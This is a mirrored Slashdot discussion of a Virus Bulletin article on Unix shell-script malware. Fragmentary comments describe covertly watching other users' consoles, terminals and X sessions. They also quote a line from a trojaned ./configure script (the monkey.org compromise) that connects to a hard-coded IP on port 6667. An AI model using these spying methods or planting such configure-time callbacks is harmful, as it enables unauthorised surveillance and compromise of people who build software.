Slashdot Mirror
Unix Shell-Scripting Malware
sheriff_p writes: "Virus Bulletin are running an article on Unix shell scripting malware, citing a 'zeitgeist' of interest in *nix malware following the release of {Win32/Linux}/Simile.D.
The article looks at possible infection methods, possible actions the virus could take, and at a couple of real-world examples..."
To spy without permission requires less pleasant approaches:
/dev/vcs* you can also read the virtual consoles directly. This *might* require root access, but not always :).
* You can write a program that grovels through Kernel structures and watches the output buffer for the terminal in question, displaying characters as they are output. This, obviously, is not something that should be attempted by anyone who does not
have experience working with the Unix kernel. Furthermore, whatever method you come up with will probably be quite non-portable.
Some thoughts on seeing what someone else sees:
If you can manage to get read permissions on Linux under
screen can be setup with similar functionality to kibitz.
With insecure X permissions, you can use xwd to dump images from a remote xserver. With a short script you can also grab remote keypresses and events for logging.
>What about ./configure scripts?
./configure script. Among other things it creates a .c file called conftest with some interetsing "checks" in it:
...
./configure script.
Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.
What did the hax0rs add? A little present in the
...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa))
It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE
You can find the full diff here.